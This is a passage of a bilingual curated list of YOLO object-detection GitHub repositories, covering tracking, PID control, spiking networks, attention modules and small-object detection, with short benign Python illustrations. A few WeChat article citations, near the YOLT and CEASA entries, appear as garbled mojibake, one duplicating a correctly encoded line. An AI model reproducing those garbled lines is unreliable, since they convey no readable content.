- [ArtLabss/tennis-tracking](https://github.com/ArtLabss/tennis-tracking) <img src="https://img.shields.io/github/stars/ArtLabss/tennis-tracking?style=social"/> : Open-source Monocular Python HawkEye for Tennis.
- [CaptainEven/YOLOV4_MCMOT](https://github.com/CaptainEven/YOLOV4_MCMOT) <img src="https://img.shields.io/github/stars/CaptainEven/YOLOV4_MCMOT?style=social"/> : Using YOLOV4 as detector for MCMOT.
- [opendatacam/node-moving-things-tracker](https://github.com/opendatacam/node-moving-things-tracker) <img src="https://img.shields.io/github/stars/opendatacam/node-moving-things-tracker?style=social"/> : JavaScript implementation of tracking-by-detection for realtime multiple object tracking (MOT).
- [lanmengyiyu/yolov5-deepmar](https://github.com/lanmengyiyu/yolov5-deepmar) <img src="https://img.shields.io/github/stars/lanmengyiyu/yolov5-deepmar?style=social"/> : Pedestrian trajectory and attribute analysis.
- [zengwb-lx/Yolov5-Deepsort-Fastreid](https://github.com/zengwb-lx/Yolov5-Deepsort-Fastreid) <img src="https://img.shields.io/github/stars/zengwb-lx/Yolov5-Deepsort-Fastreid?style=social"/> : A complete person re-identification system with YoloV5 + deepsort + Fast-ReID.
- [tensorturtle/classy-sort-yolov5](https://github.com/tensorturtle/classy-sort-yolov5) <img src="https://img.shields.io/github/stars/tensorturtle/classy-sort-yolov5?style=social"/> : Ready-to-use realtime multi-object tracker that works for any object category. YOLOv5 + SORT implementation.
- [supperted825/FairMOT-X](https://github.com/supperted825/FairMOT-X) <img src="https://img.shields.io/github/stars/supperted825/FairMOT-X?style=social"/> : FairMOT for Multi-Class MOT using YOLOX as Detector.
- [deyiwang89/pytorch-yolov7-deepsort](https://github.com/deyiwang89/pytorch-yolov7-deepsort) <img src="https://img.shields.io/github/stars/deyiwang89/pytorch-yolov7-deepsort?style=social"/> : an implementation of yolov7-deepsort based on pytorch.
- [xuarehere/yolovx_deepsort_pytorch](https://github.com/xuarehere/yolovx_deepsort_pytorch) <img src="https://img.shields.io/github/stars/xuarehere/yolovx_deepsort_pytorch?style=social"/> : This project supports existing YOLO detection models (YOLOv3, YOLOv4, YOLOv4Scaled, YOLOv5, YOLOv6, YOLOv7).
- [deshwalmahesh/yolov7-deepsort-tracking](https://github.com/deshwalmahesh/yolov7-deepsort-tracking) <img src="https://img.shields.io/github/stars/deshwalmahesh/yolov7-deepsort-tracking?style=social"/> : Modular and ready to deploy code to detect and track videos using YOLO-v7 and DeepSORT.
- [RizwanMunawar/yolov7-object-tracking](https://github.com/RizwanMunawar/yolov7-object-tracking) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-object-tracking?style=social"/> : YOLOv7 Object Tracking Using PyTorch, OpenCV and Sort Tracking.
- [RizwanMunawar/yolov5-object-tracking](https://github.com/RizwanMunawar/yolov5-object-tracking) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov5-object-tracking?style=social"/> : YOLOv5 Object Tracking + Detection + Object Blurring + Streamlit Dashboard Using OpenCV, PyTorch and Streamlit.
- [Smorodov/Multitarget-tracker](https://github.com/Smorodov/Multitarget-tracker) <img src="https://img.shields.io/github/stars/Smorodov/Multitarget-tracker?style=social"/> : Multiple Object Tracker, based on Hungarian algorithm + Kalman filter.
- [Naughty-Galileo/YoloV5_MCMOT](https://github.com/Naughty-Galileo/YoloV5_MCMOT) <img src="https://img.shields.io/github/stars/Naughty-Galileo/YoloV5_MCMOT?style=social"/> : Multi-class multi-object tracking with YoloV5 + SORT/DeepSORT/ByteTrack/BoT-SORT/MOTDT.
- [MuhammadMoinFaisal/YOLOv8-DeepSORT-Object-Tracking](https://github.com/MuhammadMoinFaisal/YOLOv8-DeepSORT-Object-Tracking) <img src="https://img.shields.io/github/stars/MuhammadMoinFaisal/YOLOv8-DeepSORT-Object-Tracking?style=social"/> : YOLOv8 Object Tracking using PyTorch, OpenCV and DeepSORT.
- [sujanshresstha/YOLO-NAS_DeepSORT](https://github.com/sujanshresstha/YOLO-NAS_DeepSORT) <img src="https://img.shields.io/github/stars/sujanshresstha/YOLO-NAS_DeepSORT?style=social"/> : This repository contains code for object tracking in videos using the YOLO-NAS object detection model and the DeepSORT algorithm.
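Nearly all of the trackers above share the same tracking-by-detection skeleton: a YOLO detector proposes boxes per frame, and an association step links them across frames. A toy greedy IoU matcher (an illustrative stand-in for SORT/DeepSORT's Hungarian matching and Kalman prediction; all names here are invented for the sketch):

```python
def iou(a, b):
    """IoU of two boxes given as (x1, y1, x2, y2)."""
    ix1, iy1 = max(a[0], b[0]), max(a[1], b[1])
    ix2, iy2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(0, ix2 - ix1) * max(0, iy2 - iy1)
    area = lambda r: (r[2] - r[0]) * (r[3] - r[1])
    return inter / (area(a) + area(b) - inter + 1e-9)

class GreedyIoUTracker:
    def __init__(self, iou_thresh=0.3):
        self.iou_thresh = iou_thresh
        self.tracks = {}        # track_id -> last seen box
        self.next_id = 0

    def update(self, detections):
        assigned, free = {}, dict(self.tracks)
        for det in detections:
            best_id, best_iou = None, self.iou_thresh
            for tid, box in free.items():
                overlap = iou(det, box)
                if overlap > best_iou:
                    best_id, best_iou = tid, overlap
            if best_id is None:             # no match: start a new track
                best_id, self.next_id = self.next_id, self.next_id + 1
            else:
                free.pop(best_id)
            assigned[best_id] = det
        self.tracks = assigned              # unmatched tracks are dropped immediately
        return assigned

tracker = GreedyIoUTracker()
print(tracker.update([(10, 10, 50, 80)]))   # {0: (10, 10, 50, 80)}
print(tracker.update([(12, 11, 52, 82)]))   # same ID 0 carried over
```

Real trackers in the list add Kalman-filter motion prediction, appearance embeddings (OSNet/ReID), and track lifecycle management on top of this matching step.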
- #### Dynamic Object Tracking ##### 动态目标跟踪
- [PolyU-AIRO-Lab/AUTO](https://github.com/PolyU-AIRO-Lab/AUTO) <img src="https://img.shields.io/github/stars/PolyU-AIRO-Lab/AUTO?style=social"/> : "Dynamic Object Tracking on Autonomous UAV System for Surveillance Applications". (**[Sensors 2021](https://www.mdpi.com/1424-8220/21/23/7888)**)
- #### Deep Reinforcement Learning #### 深度强化学习
- [uzkent/EfficientObjectDetection](https://github.com/uzkent/EfficientObjectDetection) <img src="https://img.shields.io/github/stars/uzkent/EfficientObjectDetection?style=social"/> : "Efficient Object Detection in Large Images with Deep Reinforcement Learning". (**[WACV 2020](https://openaccess.thecvf.com/content_WACV_2020/html/Uzkent_Efficient_Object_Detection_in_Large_Images_Using_Deep_Reinforcement_Learning_WACV_2020_paper.html)**)
- #### Motion Control Field #### 运动控制领域
- [icns-distributed-cloud/adaptive-cruise-control](https://github.com/icns-distributed-cloud/adaptive-cruise-control) <img src="https://img.shields.io/github/stars/icns-distributed-cloud/adaptive-cruise-control?style=social"/> : Implementation of adaptive cruise control that keeps a constant following distance using YOLOv5 on monocular camera footage.
- [LeBronLiHD/ZJU2021_MotionControl_PID_YOLOv5](https://github.com/LeBronLiHD/ZJU2021_MotionControl_PID_YOLOv5) <img src="https://img.shields.io/github/stars/LeBronLiHD/ZJU2021_MotionControl_PID_YOLOv5?style=social"/> : ZJU2021_MotionControl_PID_YOLOv5.
- [SananSuleymanov/PID_YOLOv5s_ROS_Diver_Tracking](https://github.com/SananSuleymanov/PID_YOLOv5s_ROS_Diver_Tracking) <img src="https://img.shields.io/github/stars/SananSuleymanov/PID_YOLOv5s_ROS_Diver_Tracking?style=social"/> : PID_YOLOv5s_ROS_Diver_Tracking.
- [sumght-z/apex_yolov5](https://github.com/sumght-z/apex_yolov5) <img src="https://img.shields.io/github/stars/sumght-z/apex_yolov5?style=social"/> : An experiment combining yolov5 and PID control.
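The PID-based entries above all close the loop the same way: the detector reports where the target is, and a controller turns the pixel error into an actuator command. A minimal positional PID keeping a detected box horizontally centered in the frame (purely illustrative; the gains, frame size and detection values are placeholders):

```python
class PID:
    def __init__(self, kp, ki, kd, dt=1 / 30):   # dt: seconds per frame
        self.kp, self.ki, self.kd, self.dt = kp, ki, kd, dt
        self.integral = 0.0
        self.prev_error = 0.0

    def step(self, error):
        self.integral += error * self.dt
        derivative = (error - self.prev_error) / self.dt
        self.prev_error = error
        return self.kp * error + self.ki * self.integral + self.kd * derivative

# Steer so the detected box's center converges to the image center.
pan = PID(kp=0.004, ki=0.0002, kd=0.001)
frame_w = 1280
box_x1, box_x2 = 600, 700                 # placeholder detection from any YOLO model
error_px = frame_w / 2 - (box_x1 + box_x2) / 2
command = pan.step(error_px)              # e.g. a yaw rate or servo increment
print(command)
```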
- #### Super-Resolution Field #### 超分辨率领域
- [Fireboltz/Psychic-CCTV](https://github.com/Fireboltz/Psychic-CCTV) <img src="https://img.shields.io/github/stars/Fireboltz/Psychic-CCTV?style=social"/> : A video analysis tool built completely in python.
- #### Spiking Neural Network #### SNN, 脉冲神经网络
- [EMS-YOLO](https://github.com/BICLab/EMS-YOLO) <img src="https://img.shields.io/github/stars/BICLab/EMS-YOLO?style=social"/> : Official implementation of "Deep Directly-Trained Spiking Neural Networks for Object Detection". (**[ICCV 2023](https://openaccess.thecvf.com/content/ICCV2023/html/Su_Deep_Directly-Trained_Spiking_Neural_Networks_for_Object_Detection_ICCV_2023_paper.html)**)
- [Attention-SNN](https://github.com/BICLab/Attention-SNN) <img src="https://img.shields.io/github/stars/BICLab/Attention-SNN?style=social"/> : Official implementation of "Attention Spiking Neural Networks". (**[IEEE TPAMI 2023](https://ieeexplore.ieee.org/abstract/document/10032591)**)
- [Spike-Driven-Transformer](https://github.com/BICLab/Spike-Driven-Transformer) <img src="https://img.shields.io/github/stars/BICLab/Spike-Driven-Transformer?style=social"/> : Official implementation of "Spike-driven Transformer". (**[NeurIPS 2023](https://openreview.net/forum?id=9FmolyOHi5)**)
- [Spike-Driven-Transformer-V2](https://github.com/BICLab/Spike-Driven-Transformer-V2) <img src="https://img.shields.io/github/stars/BICLab/Spike-Driven-Transformer-V2?style=social"/> : Official implementation of "Spike-driven Transformer V2: Meta Spiking Neural Network Architecture Inspiring the Design of Next-generation Neuromorphic Chips". (**[ICLR 2024](https://openreview.net/forum?id=1SIBN5Xyw7)**)
- [Spiking-YOLOv3](https://github.com/cwq159/PyTorch-Spiking-YOLOv3) <img src="https://img.shields.io/github/stars/cwq159/PyTorch-Spiking-YOLOv3?style=social"/> : A PyTorch implementation of Spiking-YOLOv3. Two branches are provided, based on two common PyTorch implementations of YOLOv3 ([ultralytics/yolov3](https://github.com/ultralytics/yolov3) & [eriklindernoren/PyTorch-YOLOv3](https://github.com/eriklindernoren/PyTorch-YOLOv3)), with support for Spiking-YOLOv3-Tiny at present. (**[AAAI 2020](https://ojs.aaai.org/index.php/AAAI/article/view/6787)**)
- [fjcu-ee-islab/Spiking_Converted_YOLOv4](https://github.com/fjcu-ee-islab/Spiking_Converted_YOLOv4) <img src="https://img.shields.io/github/stars/fjcu-ee-islab/Spiking_Converted_YOLOv4?style=social"/> : Object Detection Based on Dynamic Vision Sensor with Spiking Neural Network.
- [Zaabon/spiking_yolo](https://github.com/Zaabon/spiking_yolo) <img src="https://img.shields.io/github/stars/Zaabon/spiking_yolo?style=social"/> : This project is a combined neural network utilizing a spiking CNN with backpropagation and YOLOv3 for object detection.
- [Dignity-ghost/PyTorch-Spiking-YOLOv3](https://github.com/Dignity-ghost/PyTorch-Spiking-YOLOv3) <img src="https://img.shields.io/github/stars/Dignity-ghost/PyTorch-Spiking-YOLOv3?style=social"/> : A modified repository based on [Spiking-YOLOv3](https://github.com/cwq159/PyTorch-Spiking-YOLOv3) and [YOLOv3](https://pjreddie.com/darknet/yolo), which makes it suitable for the VOC dataset and YOLOv2.
- [beauty-girl-cxy/spiking-yolov5](https://github.com/beauty-girl-cxy/spiking-yolov5) <img src="https://img.shields.io/github/stars/beauty-girl-cxy/spiking-yolov5?style=social"/> : spiking-yolov5.
- #### Attention and Transformer #### 注意力机制
- [xmu-xiaoma666/External-Attention-pytorch](https://github.com/xmu-xiaoma666/External-Attention-pytorch) <img src="https://img.shields.io/github/stars/xmu-xiaoma666/External-Attention-pytorch?style=social"/> : 🍀 Pytorch implementation of various Attention Mechanisms, MLP, Re-parameter, Convolution, which is helpful to further understand papers. ⭐⭐⭐
- [MenghaoGuo/Awesome-Vision-Attentions](https://github.com/MenghaoGuo/Awesome-Vision-Attentions) <img src="https://img.shields.io/github/stars/MenghaoGuo/Awesome-Vision-Attentions?style=social"/> : Summary of related papers on visual attention. Related code will be released based on Jittor gradually. "Attention Mechanisms in Computer Vision: A Survey". (**[arXiv 2021](https://arxiv.org/abs/2111.07624)**)
- [pprp/awesome-attention-mechanism-in-cv](https://github.com/pprp/awesome-attention-mechanism-in-cv) <img src="https://img.shields.io/github/stars/pprp/awesome-attention-mechanism-in-cv?style=social"/> : 👊 Attention modules commonly used in CV; plug-and-play modules; ViT models. PyTorch implementation collection of attention modules and plug-and-play modules.
- [AbSViT](https://github.com/bfshi/AbSViT) <img src="https://img.shields.io/github/stars/bfshi/AbSViT?style=social"/> : "Top-Down Visual Attention from Analysis by Synthesis". (**[CVPR 2023](https://arxiv.org/abs/2303.13043)**). WeChat official account 「人工智能前沿讲习」: 《[【源头活水】CVPR 2023 | AbSViT:拥有自上而下注意力机制的视觉Transformer](https://mp.weixin.qq.com/s/FtVd37tOXMfu92eDSvdvbg)》. WeChat official account 「极市平台」: 《[CVPR23 Highlight|拥有top-down attention能力的vision transformer](https://mp.weixin.qq.com/s/UMA3Vk9L71zUEtNkCshYBg)》.
- [HaloTrouvaille/YOLO-Multi-Backbones-Attention](https://github.com/HaloTrouvaille/YOLO-Multi-Backbones-Attention) <img src="https://img.shields.io/github/stars/HaloTrouvaille/YOLO-Multi-Backbones-Attention?style=social"/> : This repository includes YOLOv3 with some lightweight backbones (ShuffleNetV2, GhostNet, VoVNet), some computer vision attention mechanisms (SE Block, CBAM Block, ECA Block), pruning, quantization and distillation for GhostNet.
- [kay-cottage/CoordAttention_YOLOX_Pytorch](https://github.com/kay-cottage/CoordAttention_YOLOX_Pytorch) <img src="https://img.shields.io/github/stars/kay-cottage/CoordAttention_YOLOX_Pytorch?style=social"/> : CoordAttention_YOLOX (an improved YOLOX object detection platform based on the CoordAttention coordinate attention mechanism). "Coordinate Attention for Efficient Mobile Network Design". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Hou_Coordinate_Attention_for_Efficient_Mobile_Network_Design_CVPR_2021_paper.html), [Andrew-Qibin/CoordAttention](https://github.com/Andrew-Qibin/CoordAttention)**)
- [liangzhendong123/Attention-yolov5](https://github.com/liangzhendong123/Attention-yolov5) <img src="https://img.shields.io/github/stars/liangzhendong123/Attention-yolov5?style=social"/> : A yolov5 model improved with attention mechanisms.
- [e96031413/AA-YOLO](https://github.com/e96031413/AA-YOLO) <img src="https://img.shields.io/github/stars/e96031413/AA-YOLO?style=social"/> : Attention ALL-CNN Twin Head YOLO (AA-YOLO). "Improving Tiny YOLO with Fewer Model Parameters". (**[IEEE BigMM 2021](https://ieeexplore.ieee.org/abstract/document/9643269/)**)
- [anonymoussss/YOLOX-SwinTransformer](https://github.com/anonymoussss/YOLOX-SwinTransformer) <img src="https://img.shields.io/github/stars/anonymoussss/YOLOX-SwinTransformer?style=social"/> : YOLOX with Swin-Transformer backbone.
- [GuanRunwei/MAN-and-CAT](https://github.com/GuanRunwei/MAN-and-CAT) <img src="https://img.shields.io/github/stars/GuanRunwei/MAN-and-CAT?style=social"/> : "MAN and CAT: mix attention to nn and concatenate attention to YOLO". (**[The Journal of Supercomputing, 2022](https://link.springer.com/article/10.1007/s11227-022-04726-7)**)
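Many of the entries above bolt a channel-attention block onto a YOLO backbone or neck. For reference, a squeeze-and-excitation style block in PyTorch; this is a generic sketch of the technique, not the implementation of any specific repo listed here:

```python
import torch
import torch.nn as nn

class SEBlock(nn.Module):
    """Channel attention: squeeze spatial dims, excite per-channel weights."""
    def __init__(self, channels, reduction=16):
        super().__init__()
        self.pool = nn.AdaptiveAvgPool2d(1)          # squeeze: B x C x 1 x 1
        self.fc = nn.Sequential(
            nn.Linear(channels, channels // reduction),
            nn.ReLU(inplace=True),
            nn.Linear(channels // reduction, channels),
            nn.Sigmoid(),                            # per-channel gate in (0, 1)
        )

    def forward(self, x):
        b, c, _, _ = x.shape
        w = self.fc(self.pool(x).view(b, c)).view(b, c, 1, 1)
        return x * w                                 # excite: reweight channels

x = torch.randn(2, 64, 80, 80)                       # e.g. a YOLO neck feature map
print(SEBlock(64)(x).shape)                          # torch.Size([2, 64, 80, 80])
```

CBAM, ECA and coordinate attention follow the same insert-and-reweight pattern with different gating functions.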
- ### Small Object Detection #### 小目标检测
- [kuanhungchen/awesome-tiny-object-detection](https://github.com/kuanhungchen/awesome-tiny-object-detection) <img src="https://img.shields.io/github/stars/kuanhungchen/awesome-tiny-object-detection?style=social"/> : 🕶 A curated list of Tiny Object Detection papers and related resources.
- [shaunyuan22/SODA](https://github.com/shaunyuan22/SODA) <img src="https://img.shields.io/github/stars/shaunyuan22/SODA?style=social"/> : Official code library for SODA: A Large-scale Benchmark for Small Object Detection. "Towards Large-Scale Small Object Detection: Survey and Benchmarks". (**[arXiv 2022](https://arxiv.org/abs/2207.14096)**)
- [SAHI](https://github.com/obss/sahi) <img src="https://img.shields.io/github/stars/obss/sahi?style=social"/> : "Slicing Aided Hyper Inference and Fine-tuning for Small Object Detection". (**[arXiv 2022](https://arxiv.org/abs/2202.06934v2), [Zenodo 2021](https://doi.org/10.5281/zenodo.5718950)**). A lightweight vision library for performing large scale object detection/instance segmentation. SAHI currently supports [YOLOv5 models](https://github.com/ultralytics/yolov5/releases), [MMDetection models](https://github.com/open-mmlab/mmdetection/blob/master/docs/en/model_zoo.md), [Detectron2 models](https://github.com/facebookresearch/detectron2/blob/main/MODEL_ZOO.md), [HuggingFace models](https://huggingface.co/models?pipeline_tag=object-detection&sort=downloads) and [TorchVision models](https://pytorch.org/docs/stable/torchvision/models.html).
- [Slim-neck by GSConv](https://github.com/AlanLi1997/slim-neck-by-gsconv) <img src="https://img.shields.io/github/stars/AlanLi1997/slim-neck-by-gsconv?style=social"/> : "Slim-neck by GSConv: A better design paradigm of detector architectures for autonomous vehicles". (**[arXiv 2022](https://arxiv.org/abs/2206.02424)**)
- [hustvl/TinyDet](https://github.com/hustvl/TinyDet) <img src="https://img.shields.io/github/stars/hustvl/TinyDet?style=social"/> : "TinyDet: accurately detecting small objects within 1 GFLOPs". (**[Science China Information Sciences, 2023](https://link.springer.com/article/10.1007/s11432-021-3504-4)**)
- [QueryDet](https://github.com/ChenhongyiYang/QueryDet-PyTorch) <img src="https://img.shields.io/github/stars/ChenhongyiYang/QueryDet-PyTorch?style=social"/> : "QueryDet: Cascaded Sparse Query for Accelerating High-Resolution Small Object Detection". (**[CVPR 2022](https://openaccess.thecvf.com/content/CVPR2022/html/Yang_QueryDet_Cascaded_Sparse_Query_for_Accelerating_High-Resolution_Small_Object_Detection_CVPR_2022_paper.html)**)
- [RFLA](https://github.com/Chasel-Tsui/mmdet-rfla) <img src="https://img.shields.io/github/stars/Chasel-Tsui/mmdet-rfla?style=social"/> : "RFLA: Gaussian Receptive Field based Label Assignment for Tiny Object Detection". (**[ECCV 2022](https://arxiv.org/abs/2208.08738)**). WeChat official account 「CV技术指南」: 《[ECCV 2022 | RFLA:基于高斯感受野的微小目标检测标签分配](https://mp.weixin.qq.com/s/h0J775I3D6zoTIeaJRnFgQ)》.
- [YOLT](https://github.com/avanetten/yolt) <img src="https://img.shields.io/github/stars/avanetten/yolt?style=social"/> : "You Only Look Twice: Rapid Multi-Scale Object Detection In Satellite Imagery". (**[arXiv 2018](https://arxiv.org/abs/1805.09512)**). WeChat official account 「江大白」: 《[基于大尺寸图像的小目标检测竞赛经验总结](https://mp.weixin.qq.com/s?__biz=Mzg5NzgyNTU2Mg==&mid=2247498265&idx=1&sn=1eee95f8f4d09d761dc7b94f4ac55c34&source=41#wechat_redirect)》.
"ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๆฑŸๅคง็™ฝใ€ใ€Š[ๅŸบไบŽๅคงๅฐบๅฏธๅ›พๅƒ็š„ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็ซž่ต›็ป้ชŒๆ€ป็ป“](https://mp.weixin.qq.com/s?__biz=Mzg5NzgyNTU2Mg==&mid=2247498265&idx=1&sn=1eee95f8f4d09d761dc7b94f4ac55c34&source=41#wechat_redirect)ใ€‹" - [SIMRDWN](https://github.com/avanetten/simrdwn) <img src="https://img.shields.io/github/stars/avanetten/simrdwn?style=social"/> : "Satellite Imagery Multiscale Rapid Detection with Windowed Networks". (**[arXiv 2018](https://arxiv.org/abs/1809.09978), [WACV 2019](https://ieeexplore.ieee.org/abstract/document/8659155)**) - [YOLTv5](https://github.com/avanetten/yoltv5) <img src="https://img.shields.io/github/stars/avanetten/yoltv5?style=social"/> : YOLTv5 builds upon [YOLT](https://github.com/avanetten/yolt) and [SIMRDWN](https://github.com/avanetten/simrdwn), and updates these frameworks to use the [ultralytics/yolov5](https://github.com/ultralytics/yolov5) version of the YOLO object detection family. - [TPH-YOLOv5](https://github.com/cv516Buaa/tph-yolov5) <img src="https://img.shields.io/github/stars/cv516Buaa/tph-yolov5?style=social"/> : "TPH-YOLOv5: Improved YOLOv5 Based on Transformer Prediction Head for Object Detection on Drone-Captured Scenarios". (**[ICCV 2021](https://openaccess.thecvf.com/content/ICCV2021W/VisDrone/html/Zhu_TPH-YOLOv5_Improved_YOLOv5_Based_on_Transformer_Prediction_Head_for_Object_ICCVW_2021_paper.html)**) - [mwaseema/Drone-Detection](https://github.com/mwaseema/Drone-Detection) <img src="https://img.shields.io/github/stars/mwaseema/Drone-Detection?style=social"/> : "Dogfight: Detecting Drones from Drones Videos". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Ashraf_Dogfight_Detecting_Drones_From_Drones_Videos_CVPR_2021_paper.html)**) - [CEASA](https://github.com/cuogeihong/ceasc) <img src="https://img.shields.io/github/stars/cuogeihong/ceasc?style=social"/> : "Adaptive Sparse Convolutional Networks with Global Context Enhancement for Faster Object Detection on Drone Images". (**[arXiv 2023](https://arxiv.org/abs/2303.14488)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[ๅณๆ’ๅณ็”จ | CEASAๆจกๅ—็ป™ไฝ ๆ‰€ๆœ‰๏ผŒๅฐ็›ฎๆ ‡็ฒพๅบฆๆๅ‡็š„ๅŒๆ—ถ้€ŸๅบฆไนŸๅ˜ๅฟซไบ†](https://mp.weixin.qq.com/s/-a4Wz04jLHFiAU88pUyDNQ)ใ€‹" - [KevinMuyaoGuo/yolov5s_for_satellite_imagery](https://github.com/KevinMuyaoGuo/yolov5s_for_satellite_imagery) <img src="https://img.shields.io/github/stars/KevinMuyaoGuo/yolov5s_for_satellite_imagery?style=social"/> : ๅŸบไบŽYOLOv5็š„ๅซๆ˜Ÿๅ›พๅƒ็›ฎๆ ‡ๆฃ€ๆต‹demo | A demo for satellite imagery object detection based on YOLOv5ใ€‚ - [Hongyu-Yue/yoloV5_modify_smalltarget](https://github.com/Hongyu-Yue/yoloV5_modify_smalltarget) <img src="https://img.shields.io/github/stars/Hongyu-Yue/yoloV5_modify_smalltarget?style=social"/> : YOLOV5 ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไฟฎๆ”น็‰ˆใ€‚ - [muyuuuu/Self-Supervise-Object-Detection](https://github.com/muyuuuu/Self-Supervise-Object-Detection) <img src="https://img.shields.io/github/stars/muyuuuu/Self-Supervise-Object-Detection?style=social"/> : Self-Supervised Object Detection. ๆฐด้ขๆผ‚ๆตฎๅžƒๅœพ็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒๅˆ†ๆžๆบ็ ๆ”นๅ–„ yolox ๆฃ€ๆต‹ๅฐ็›ฎๆ ‡็š„็ผบ้™ท๏ผŒๆๅ‡บ่‡ช็›‘็ฃ็ฎ—ๆณ•้ข„่ฎญ็ปƒๆ— ๆ ‡็ญพๆ•ฐๆฎ๏ผŒๆๅ‡ๆฃ€ๆต‹ๆ€ง่ƒฝใ€‚ - [swricci/small-boat-detector](https://github.com/swricci/small-boat-detector) <img src="https://img.shields.io/github/stars/swricci/small-boat-detector?style=social"/> : Trained yolo v3 model weights and configuration file to detect small boats in satellite imagery. 
- [Resham-Sundar/sahi-yolox](https://github.com/Resham-Sundar/sahi-yolox) <img src="https://img.shields.io/github/stars/Resham-Sundar/sahi-yolox?style=social"/> : YoloX with SAHI implementation.
- YOLO-Z : "YOLO-Z: Improving small object detection in YOLOv5 for autonomous vehicles". (**[arXiv 2021](https://arxiv.org/abs/2112.11798)**). WeChat official account 「计算机视觉研究院」: 《[Yolo-Z:改进的YOLOv5用于小目标检测(附原论文下载)](https://mp.weixin.qq.com/s/ehkUapLOMdDghF2kAoAV4w)》.
- M2S : "A novel Multi to Single Module for small object detection". (**[arXiv 2023](https://arxiv.org/abs/2303.14977)**). WeChat official account 「集智书童」: 《[基于YOLOv5改进再设计 | M2S全面提升小目标精度](https://mp.weixin.qq.com/s/FlKgYYGUHtJAxCF2wrh4NA)》.
- [ultralytics/xview-yolov3](https://github.com/ultralytics/xview-yolov3) <img src="https://img.shields.io/github/stars/ultralytics/xview-yolov3?style=social"/> : xView 2018 Object Detection Challenge: YOLOv3 Training and Inference.
- [inderpreet1390/yolov5-small-target](https://github.com/inderpreet1390/yolov5-small-target) <img src="https://img.shields.io/github/stars/inderpreet1390/yolov5-small-target?style=social"/> : Repository for improved yolov5 for small target detection.
- [AllenSquirrel/YOLOv3_ReSAM](https://github.com/AllenSquirrel/YOLOv3_ReSAM) <img src="https://img.shields.io/github/stars/AllenSquirrel/YOLOv3_ReSAM?style=social"/> : YOLOv3_ReSAM: A Small Target Detection Method With Spatial Attention Module.
- [kadirnar/yolov5-sahi](https://github.com/kadirnar/yolov5-sahi) <img src="https://img.shields.io/github/stars/kadirnar/yolov5-sahi?style=social"/> : Custom object training with the Yolov5 model and SAHI usage.
- [kadirnar/Yolov6-SAHI](https://github.com/kadirnar/Yolov6-SAHI) <img src="https://img.shields.io/github/stars/kadirnar/Yolov6-SAHI?style=social"/> : Yolov6-SAHI.
- [zRzRzRzRzRzRzR/Mult-YOLO-alogorithm-of-RoboMaster-Radar-Detection-2023](https://github.com/zRzRzRzRzRzRzR/Mult-YOLO-alogorithm-of-RoboMaster-Radar-Detection-2023) <img src="https://img.shields.io/github/stars/zRzRzRzRzRzRzR/Mult-YOLO-alogorithm-of-RoboMaster-Radar-Detection-2023?style=social"/> : YOLO small object detection for the 2023 RoboMaster radar of the XJTLU Dongyun Technology GMaster team.
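The SAHI-based entries above all rely on the same idea: slice a large image into overlapping tiles, run the detector per tile, then merge predictions back into full-image coordinates. A minimal sketch using sahi's high-level API (assuming a local YOLOv5 weights file; paths, slice sizes and the exact accessor methods vary across sahi versions):

```python
from sahi import AutoDetectionModel
from sahi.predict import get_sliced_prediction

model = AutoDetectionModel.from_pretrained(
    model_type='yolov5', model_path='yolov5s.pt', confidence_threshold=0.4,
)
result = get_sliced_prediction(
    'satellite.jpg', model,
    slice_height=512, slice_width=512,           # tile size
    overlap_height_ratio=0.2, overlap_width_ratio=0.2,
)
for pred in result.object_prediction_list:       # merged, full-image coordinates
    print(pred.category.name, pred.bbox.to_xyxy(), pred.score.value)
```

The overlap between tiles is what lets objects cut by a tile border still be detected; duplicate predictions in the overlap are merged by NMS/NMM during postprocessing.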
- ### Few-shot Object Detection #### 少样本目标检测
- [bingykang/Fewshot_Detection](https://github.com/bingykang/Fewshot_Detection) <img src="https://img.shields.io/github/stars/bingykang/Fewshot_Detection?style=social"/> : "Few-shot Object Detection via Feature Reweighting". (**[ICCV 2019](https://openaccess.thecvf.com/content_ICCV_2019/html/Kang_Few-Shot_Object_Detection_via_Feature_Reweighting_ICCV_2019_paper.html)**)
- [SSDA-YOLO](https://github.com/hnuzhy/SSDA-YOLO) <img src="https://img.shields.io/github/stars/hnuzhy/SSDA-YOLO?style=social"/> : Codes for my paper "SSDA-YOLO: Semi-supervised Domain Adaptive YOLO for Cross-Domain Object Detection". (**[Computer Vision and Image Understanding, 2023](https://www.sciencedirect.com/science/article/abs/pii/S1077314223000292)**)
- [OneTeacher](https://github.com/luogen1996/OneTeacher) <img src="https://img.shields.io/github/stars/luogen1996/OneTeacher?style=social"/> : "Towards End-to-end Semi-supervised Learning for One-stage Object Detection". (**[arXiv 2023](https://arxiv.org/abs/2302.11299)**)
- [Efficient Teacher](https://github.com/AlibabaResearch/efficientteacher) <img src="https://img.shields.io/github/stars/AlibabaResearch/efficientteacher?style=social"/> : "Efficient Teacher: Semi-Supervised Object Detection for YOLOv5". (**[arXiv 2023](https://arxiv.org/abs/2302.07577)**)
- ### Open World Object Detection #### 开放世界目标检测
- [UniDetector](https://github.com/zhenyuw16/UniDetector) <img src="https://img.shields.io/github/stars/zhenyuw16/UniDetector?style=social"/> : "Detecting Everything in the Open World: Towards Universal Object Detection". (**[CVPR 2023](https://arxiv.org/abs/2303.11749)**). WeChat official account 「我爱计算机视觉」: 《[CVPR 2023 | 标注500类,检测7000类!清华大学等提出通用目标检测算法UniDetector](https://mp.weixin.qq.com/s/r7N8X_8riboCvafl9f1vDQ)》. WeChat official account 「自动驾驶之心」: 《[CVPR 2023|UniDetector:7000类通用目标检测算法(港大&清华)](https://mp.weixin.qq.com/s/iRe4RhSEm4Oe4DxKX5wu9w)》.
- [buxihuo/OW-YOLO](https://github.com/buxihuo/OW-YOLO) <img src="https://img.shields.io/github/stars/buxihuo/OW-YOLO?style=social"/> : Detect known and unknown objects in the open world (a new detector able to distinguish known from unknown objects).
- ### Oriented Object Detection #### 旋转目标检测
